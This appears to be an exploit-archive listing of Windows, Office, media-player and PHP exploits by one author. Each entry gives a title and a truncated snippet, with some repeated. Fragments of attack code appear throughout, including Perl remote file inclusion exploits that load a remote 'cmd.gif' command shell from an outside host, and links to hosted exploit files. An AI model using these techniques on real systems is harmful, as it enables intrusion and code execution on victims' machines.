Windows Task Scheduler Privilege Escalation 0day (CVE-2010-3338)

No description provided by source. Exploit Title: Windows Task Scheduler Privilege Escalation 0day Date: 20-11-2010 Author: webDEViL Tested on: Windows 7/2008 x86/x64 crctable = new Array 0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832,...

Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC

No description provided by source. Exploit Title: Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC Date: date Author: webDEViL Software Link: download link if available Version: app version Tested on: ALL CVE : CVE-2011-1276 w3bd3vilatgmaildotcom twitter.com/w3bd3vil open FILE,...

Windows Escalate Task Scheduler XML Privilege Escalation

This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that...

Excel SLYK Format Parsing Buffer Overflow

Exploit Title: Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC Date: date Author: webDEViL Software Link: download link if available Version: app version Tested on: ALL CVE : CVE-2011-1276 w3bd3vilatgmaildotcom twitter.com/w3bd3vil open FILE, 'CVE-2011-1276.slk'; print FILE "ID;P\n";...

Excel - SLYK Format Parsing Buffer Overrun (PoC)

Exploit Title: Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC Date: date Author: webDEViL Software Link: download link if available Version: app version Tested on: ALL CVE : CVE-2011-1276 w3bd3vilatgmaildotcom twitter.com/w3bd3vil open FILE, 'CVE-2011-1276.slk'; print FILE "ID;P\n";...

Excel - SLYK Format Parsing Buffer Overrun (PoC)

Excel - SLYK Format Parsing Buffer Overrun PoC Exploit Title: Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC Date: date Author: webDEViL Software Link: download link if available Version: app version Tested on: ALL CVE : CVE-2011-1276 w3bd3vilatgmaildotcom twitter.com/w3bd3vil open...

Windows Task Scheduler Privilege Escalation

Exploit Title: Windows Task Scheduler Privilege Escalation 0day Date: 20-11-2010 Author: webDEViL Tested on: Windows 7/2008 x86/x64 crctable = new Array 0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988,...

Quick Player 1.3 Unicode SEH Exploit

Quick Player 1.3 Unicode SEH Exploit Author Abhishek Lyall and Puneet Jain [email protected] , abhilyallatgmaildotcom, infoataslitsecuritydotcom Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Download Vulnerable application from...

Microsoft Excel - 0x5D record Stack Overflow (MS10-038)

Microsoft Excel - 0x5D record Stack Overflow MS10-038 This is an exploit for MS10-038/CVE-2010-0822 Everything is hardcoded! winxp sp3 webDEViL w3bd3vilatgmaildot.com http://krash.in/excel1.xls Office 2007 - 12.0.4518.1014 MS10-038 bulletin states that Office 2007 is not vulnerable, lol import...

Real Player 12.0.0.879 - Code Execution

Real Player 12.0.0.879 - Code Execution Exploit Title: Real Player 12.0.0.879 0day for WinXP Date: 09/07/2010 Author: webDEViL Version: 12.0.0.879 Tested on: WinXP This bug utilizes Microsoft Help vuln for RCE. You can test by browsing to http://krash.in/real-exp/exploit.ram...

MS Windows 2003 (EOT File) BSOD Crash Exploit

Exploit for unknown platform in category dos / poc ============================================= MS Windows 2003 EOT File BSOD Crash Exploit ============================================= MS Windows 2003 EOT File BSOD Crash Exploit author: webDEViL http://inj3ct0r.com/sploits/6962.zip 0day.today...

Microsoft Windows Server 2003 - .EOT Blue Screen of Death Crash

Microsoft Windows Server 2003 - .EOT Blue Screen of Death Crash MS Windows 2003 EOT File BSOD Crash Exploit author: webDEViL https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9417.zip 2009-wwbsod.zip milw0rm.com 2009-08-11...

Technote 7 - 'shop_this_skin_path' Remote File Inclusion

-----------webDEViL - w3bd3vil at gmail dot com ----------- -----------Technote 7 Remote File Inclusion------------------------ ----------developers site: http://www.technote.co.kr-------------- bash-3.1 cat technote7/skinshop/standard/3plugintwindow/twindownotice.php ...snip... $TWINSET'dirpath'...

Technote 7 - shop_this_skin_path Remote File Inclusion

Technote 7 - shopthisskinpath Remote File Inclusion -----------webDEViL - w3bd3vil at gmail dot com ----------- -----------Technote 7 Remote File Inclusion------------------------ ----------developers site: http://www.technote.co.kr-------------- bash-3.1 cat...

Auction 1.3m - 'phpbb_root_path' Remote File Inclusion

!/usr/bin/perl phpBB auction mod - Remote File Inclusion Vuln Bug discovered by VietMafia code copier: webDEViL w3bd3vilatgmail.com code same as Fast Click perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd shell variable: $GETcmd; use LWP::UserAgent; $Path =...

Albinator <= 2.0.6 (Config_rootdir) Remote File Inclusion Exploit

Exploit for unknown platform in category web applications ================================================================= Albinator perl wb.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd shell variable: $GETcmd; use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd =...